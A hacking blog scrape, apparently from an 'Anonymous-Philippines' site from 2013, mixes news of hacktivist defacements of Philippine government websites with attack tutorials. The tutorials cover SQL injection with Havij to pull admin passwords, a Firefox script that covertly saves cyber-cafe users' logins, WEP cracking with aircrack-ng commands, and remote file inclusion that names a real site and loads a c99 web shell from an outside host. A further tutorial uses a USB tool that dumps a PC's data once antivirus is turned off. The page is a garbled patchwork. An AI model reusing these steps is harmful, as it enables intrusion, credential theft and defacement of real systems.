Hacker (computer security)

From Wikipedia, the free encyclopedia.

Anonymous-Philippines

from:interaksyon.com

Pages

Saturday, April 27, 2013

Post Status To FB by Any Device



Post Status To FB by
Any Device :


Hello guys many of you are asking me about this trick how to update fb

status via any device just like i5,blackberry,galaxy s3,lumia,Android etc..

and shock ur friend :D its damm* easy i m going to provide u a website

from where u can update ur status via any device any os just visit the link

given below !!!!

plus points: from this site u can update ur status safely no facebook

blockage will happen this site is spam,bug,virus free enjoy :)!!

Link :

http://www.updateviaz.com/

How To Hack Sites Using Havij



How To Hack Sites 
Using H
avij: 

Just Follow these easy steps :- 

1. First download havij from Here 

2. Run Havij SQL Injection software and copy and paste vulnerable website link 

3. Now click in the “Analyze” Button 

4. Then It shows some messages there. Be alert on it and be show patience for 

sometime to find it’s vulernable and type of injection and if db server is 

mysql and it will find database name.Then after get it’s database is name like 

xxxx_xxxx 

5. Then Move to another operation to find tables by clicking “tables” as figure 

shown. Now click “Get tables” Then wait some time if needed 

6. After founded the tables ,you can see there will be “users” Put mark on it 

and click in the ” get columns ” tab 

7. In that Just put mark username and password and click “Get data” 

8. Finally you got now username and password of the admin…
Note : Only For Educational Purpose.>!!! 

Convert Mozilla To Keylogger



Convert Mozilla To
Keylogger:


How this Keylogger Works?
Whenever you login into any website using mozilla firefox browser it always ask’s
you whether you want to Save password or not for that website.We will be using
a script that will not give the user option to save the password instead it will
automatically save the passwords without user’s consent and we will retrieve them
later.

Detection against AV & Firewalls?
fully undectectable against Mcafee,Norton and Avast dont worry. 
concept? 

you can get many victims just visit a cyber_cafe and make firefox keylogger this is 
also a warning to those who use firefox in cafes :)>!! 

The keylogger will work on the basis of a script that disables the Firefox browser to 
ask the user to save his password whenever he logins to a website. Thereby, 
allowing the Firefox to store his username and password combination automatically 
without prompting the user. Just follow these steps to convert your firefox into a 
keylogger : 

1. First and foremost, download the script from Here

2. If you are a Windows user, then navigate to C:/Program Files/Mozilla 

Firefox/Components 

and if you are using MAC, then navigate to Applications -> Right Click Firefox - 

> Show Package Contents -> Contents/MacOS/Components 

3. In the downloaded rar file, you will find a script named 

as nsLoginManagerPrompter.js, simply extract and then copy and paste the file 

in the folder that is applicable to you. 

4. Your Firefox keylogger is now ready and whenever anyone enters his username 

and password on any site, (this tricks works in almost all sites like 

facebook,twitter,linked.in,gmail,myspace) his/her details would be saved 

automatically which can be easily retrieved using Fire Password viewer.

How To Hack Wi-Fi




How To Hack Wi-Fi 

Network: 

Note : Only For Educational Purpose.>!!! 

1) First we need to scan for available wireless networks. 

Theres this great tool for windows to do this.. called “NetStumbler” or Kismet 

for Windows and Linux and KisMac for Mac. 

The two most common encryption types are: 

1) WEP 

2) WAP 

WEP i.e Wire Equivalent Privacy is not consideres as safe as WAP 

i.e Wireless Application Protocol. 

WEP have many flaws that allows a hacker to crack a WEP key easily.. 

whereas 

WAP is currently the most secure and best option to secure a wi-fi network.. 

It can’t be easily cracked as WEP because the only way to retreive a WAP key 

is to use a brute-force attack or dictionary atack. 

Here I’ll tell you how to Crack WEP 

To crack WEP we will be using Live Linux distribution called BackTrack to 

crack WEP. 

BackTrack have lots of preinstalled softwares for this very purpose.. 

The tools we will be using on Backtrack are: 

Kismet – a wireless network detector 

airodump – captures packets from a wireless router 

aireplay – forges ARP requests 

aircrack – decrypts the WEP keys 

1) First of all we have to find a wireless access point along with its bssid, essid 

and channel number. To do this we will run kismet by opening up the terminal 

and typing in kismet. It may ask you for the appropriate adapter which in my 

case is ath0. You can see your device’s name by typing in the command 

iwconfig. 

2) To be able to do some of the later things, your wireless adapter must be put 

into monitor mode. Kismet automatically does this and as long as you keep it 

open, your wireless adapter will stay in monitor mode 

3) In kismet you will see the flags Y/N/0. Each one stands for a different type 

of encryption. In our case we will be looking for access points with the WEP 

encryption. Y=WEP N=OPEN 0=OTHER(usually WAP). 

4) Once you find an access point, open a text document and paste in the 

networks broadcast name (essid), its mac address (bssid) and its channel 

number. To get the above information, use the arrow keys to select an access 

point and hit <ENTER> to get more information about it. 

5) The next step is to start collecting data from the access point with 

airodump. Open up a new terminal and start airodump by typing in the 

command: 

airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device] 

In the above command airodump-ng starts the program, the channel of your 

access point goes after -c , the file you wish to output the data goes after -w , 

and the MAC address of the access point goes after –bssid. The command ends 

with the device name. Make sure to leave out the brackets. 

6) Leave the above running and open another terminal. Next we will generate 

some fake packets to the target access point so that the speed of the data 

output will increase. Put in the following command: 

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device] 

In the above command we are using the airplay-ng program. The -1 tells the 

program the specific attack we wish to use which in this case is fake 

authentication with the access point. The 0 cites the delay between attacks, -a 

is the MAC address of the target access point, -h is your wireless adapters MAC 

address, -e is the name (essid) of the target access point, and the command 

ends with the your wireless adapters device name. 

7) Now, we will force the target access point to send out a huge amount of 

packets that we will be able to take advantage of by using them to attempt to 

crack the WEP key. Once the following command is executed, check your 

airodump-ng terminal and you should see the ARP packet count to start to 

increase. The command is: 

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device] 

In this command, the -3 tells the program the specific type of attack which in 

this case is packet injection, -b is the MAC address of the target access point, -h 

is your wireless adapters MAC address, and the wireless adapter device name 

goes at the end. 

Once you have collected around 50k-500k packets, you may begin the 

attempt to break the WEP key. The command to begin the cracking process is: 

aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs 

In this command the -a 1 forces the program into the WEP attack mode, the -b 

is the targets MAC address, and the -n 128 tells the program the WEP key 

length. If you don’t know the -n , then leave it out. This should crack the WEP 

key within seconds. The more packets you capture, the bigger chance you 

have of cracking the WEP key.

Hack Sites using RFI


Hack Sites 
Using RFI: 

Lets Start 

1st Find a Vunerable websites using Google Dork 

“inurl:index.php?page=” its Most Popular Dork of RFI hacking 

This will show all the pages which has “index.php?page=” in their URL, 

Now to test whether the website is vulnerable to Remote file Inclusion or 

not the hacker use the following command 

www.targetsite.com/index.php?page=www.google.com 

See example of this website http://www.cbspk.com 

So the hacker url will become 

http://www.cbspk.com/v2/index.php?page=http://www.google.com 

If after executing the command the homepage of the google shows up 

then then the website is vulnerable to this attack if it does not come up 

then you should look for a new target. In my case after executing the 

above command in the address bar Google homepage shows up 

indicating that the website is vulnerable to this attack. 

Now the hacker would upload the shells to gain access. The most 

common shells used are c99 shell or r57 shell. I would use c99 shell. You 

can download c99 shell from the link below: 

http://www.sh3ll.org/c99.zip 

The hacker would first upload the shells to a webhosting site such as 

ripway.com, viralhosts.com,110mb.com or another free hosts etc. 

Now here is how a hacker would execute the shells to gain access. Lets 

say that the url of the shell is http://www.sh3ll.org/c99.txt? 

Now here is how a hacker would execute the following command to gain 

access 

http://www.cbspk.com/v2/index.php?page=http://www.sh3ll.org/c99.t 

xt? 

Don't Forget To add “?” after .txt at the end of url or else the shell will 

not execute. Now the hacker is inside the website and he could do 

anything with it he can upload deface pages... etc to pwned the site :p 

Note : Only For Educational Purpose.>!!!

Anonymous-Philippines


Anonymous-Philippines

Members of the hackers’ collective Anonymous-Philippines made their first public appearance on Tuesday, owning up to recent defacements of government websites and warning of more attacks unless the Cybercrime Prevention Act is scrapped.

Their faces hidden by masks with the image of Guy Fawkes--who had planned to blow up England's House of Lords in 1605 and which was adopted by the movie V for Vendetta--the small contingent attended the rally on Padre Faura against the controversial law ahead of oral arguments at the Supreme Court in Manila. 

The group decided to lie low after the High Court issued a temporary restraining order against the cybercrime law, scheduled to expire on February 6, its spokesperson who called himself “Juan de la Cruz” said. 

However, they decided to resume the offensive to drive home their message to junk the statute, de la Cruz said.

"Expect more attacks if this does not stop," De la Cruz warned the government. "If this continues, be assured no matter how secure your website is, we will attack you."

He added: "We do not know how to hurt people, we are not violent, but we can stop the government. If the cybercrime law is upheld, Internet freedom will be meaningless."

Among the websites defaced by Anonymous days before oral arguments were heard at the Supreme Court included those of the Metro Manila Development Authority, the National Food Authority, Cebu Port Authority, Philippine National Police and the Municipality of Jose Panganiban, Camarines Norte.

Last week, they also defaced the website of Senator Vicente Sotto III, a known advocate of the libel provision in the cybercrime law.

Protect our Right to Freedom of Expression


Protect our Right to Freedom of Expression!

Senator Vicente Sotto III a.k.a. Tito Sotto, who is also one of the hosts of GMA 7's noontime show, Eat Bulaga 

(EB), is a known proponent of the Cybercrime law. This could be the reason why the official website of the 

noontime show, along with 24 government websites, were hacked by the infamous Anonymous Philippines 

yesterday at dawn. (As of this writing, the EB website is already up and running.)
The Temporary Restraining Order (TRO) issued by the Supreme Court to stop law enforcement agencies such 

as the Department of Justice, the National Bureau of Investigation and the Department of Science and 

Technology (DOST) from implementing the Cybercrime law ends on February 6 2013. Together with the TRO, an 

order dated Oct. 9, 2012 states that the high court will deliberate on the issues via oral arguments on January 

15, 2013. Hence, the protesters of the law, including Anonymous Philippines, are again "alive" and actively 

campaigning for either the extension of the TRO or the non-implementation of the law.


PhilHacker Private xPhilHacker Private x


PhilHacker Private x

A day after a "Filipino" hacker group hinted at more attacks on Philippine government websites, a review of the security of government websites may get underway soon.


Presidential spokesman Edwin Lacierda indicated that National Security Adviser Cesar Garcia is studying creating a task force to do the review.


"The National Security Adviser is studying the creation of a task force to undertake a security review of government websites," he said in a statement posted on the government portal.


Among the most recent attacks on government websites was thedefacing last May 31 of the Department of Interior and Local Government's site (
www.dilg.gov.ph).


In that incident, a hacker managed to gain access to the website and display the logo of a porn site as one of the agency's "news items."


The "What's New in DILG" section of the DILG's home page contained a link boasting that the website had been "Hacked."


Clicking on the link would take the visitor to a page supposedly containing a news item. But instead of a news item, the visitor would see a logo of porn site YouJizz.


The DILG website was promptly taken offline for days before it returned to normal.


The hacker identified himself or herself as "BatangMahiligMagbatibot" in the compromised page.


But on Monday, a more "serious" group managed to hijack the site of the Philippine Nuclear Research Institute.


The group, calling itself "Philker," redirecting visitors to the PNRI site to a separate website that bore a "warning" from the "Philker" group.


"We are not trying to damage you. We only want to help protect our country's cyberspace by doing what seems to be the most efficient way to get everyone's attention. May this deface serve as a reminder that you always have to look out for intruders. No matter how intelligent and competent your computer personnel are, there will be unethical hackers that are constantly working on breaking in your security," the hackers said in their message in the redirected site.


It added that it was "fortunate" that Philker was the one that broke into the site and not other groups.


The site was inaccessible Monday afternoon and was briefly back up later in the day.


But as of Tuesday noon, visitors to the site were greeted with a "Test page."


Philker said that while it and online "thieves and terrorists" are "cut from the same cloth," its difference is that "we have good intentions."


It added it aims to elevate the Philippines' cyber culture and to "point out and correct the vulnerabilities of Philippine websites," to "protect them from unethical hackers, fraud, false propaganda and other people with malicious intent."


It also hinted at future break-ins of other sites, leaving behind a note similar to the international hacktivist group Anonymous.


"Expect more from us. We are Philker," it said - a nod to Anonymous' "Expect us" warning.

Anonymous Philippines and private x



Anonymous Philippines and private x

11 government websites hacked
Tuesday, October 2, 2012
MANILA -- Hacker groups that are against the controversial Cybercrime Prevention Law defaced 11 more government websites since 11 p.m. Monday.
"Private X" and "Anonymous Philippines" hacked websites of the Department of Interior and Local Government, the One-Stop Information Shop for Technologies in the Philippines of the Department of Science and Technology, National Telecommunications Commission (NTC), Philippine Nuclear Institute, Intellectual Property Office of the Philippines, Tourism website of the City of San Fernando, Optical Media Board, Pilipinas Anti-Piracy Team, Department of Health’s Smoke Free Philippines, Marina Industry Authority and the Maritime Training Council.
Earlier, the websites of the NTC, Food Development Center and Philippine Information Agency were inaccessible.
The hackers began their attacks on cyberspace last week in protest of the Cybercrime Prevention Act of 2012, defacing the websites of several government agencies, including the Bangko Sentral ng Pilipinas and the Metropolitan Waterworks and Sewerage System.
The hackers have since threatened for more possible attacks on government websites in protest of the Cybercrime Prevention Act.
The said measure, which was signed into law by President Benigno Aquino III on September 12, has been assailed even by the International Federation of Journalists and the New York-based Human Rights Watch for its alleged threats on freedom of speech and expression. (Sunnex)

Hacking pc Using PenDrives



Hacking pc Using
PenDrives:
Note : Only For Educational Propose.>!!!
Download ToolKit From Here:
  • Extract the software
  • open pcinfo folder
  • select all the files and paste it in your USB(pendrive)
  • it in the pc u wanna hack

Open the USB drive, give it 2 sec and and ur job is done...!!
And now open the dump folder in ur pc and u will have all the info u want
Ok now the problem which i was facing
well i think it duznt autorun on PC with antivirus... U have to manually
click the nircmd.exe
U have to disable his/her antivirus for auto running this program

Make Your Pc Faster



Make Your Pc Faster,
Guaranteed:
1. First, run a scandisk or checkdisk. Let Windows fix any errors.
2. Run a disk cleanup utility...this will flush your temporary internet folder,
trash can, temp system files, etc.
3. Delete any garbage files or data...if possible, run a Duplicate File Finder
program.
4. Run Defrag on all partitions (NOTE: run this after you have deleted all trash
and excess files!)
5. Run a registry cleaner utility and delete or get rid of any orphaned entries
in that registry.
6. Check your exisiting swap file for it's size and location (*will explain
location later in the post). If you have alot of ram (i.e. 1 gig and over) set this
swap file to something small, like 250 mb. The reason is that this will force
Windows to load more into memory, resulting in faster performance (note:
some games and applications actually require a certain sized swap file so
check your applications performance after making a size adjustment for any
error messages.)
7. Under XP, you can tell Windows to use Classic Style on your desktop, - this
will remove the neat single click and internet-style desktop but for lower end
systems this will improve performance in other areas, such as gaming and
multi-tasking.
8. Run msconfig and under startup and only keep the programs that are
essential to load in the tray icon (and hence stay resident in memory).
Uncheck anything else non-essential, like an ATI or Nvidia control panel,
Quicktime utility, Real Audio, etc.
9. Upgrade drivers! Check for the latest BIOS, video, motherboard, sound, etc
drivers from the manufacturers. Alot of my friends had chipsets on their
motherboard that had advanced disk management capabilities or AGP port
settings but the drivers weren't loaded for them so they were never being
used. A simple upgrade realized a noticeable difference. For instance, they
didn't have the latest driver for their AGP port so it was set to 1x, instead of
being used at 4x!
10. (OK, so this won't speed up your PC but it could save you alot of time and
trouble later on!) After making all these improvements, make a working
backup! I use Ghost, but for XP users you can also use System Restore...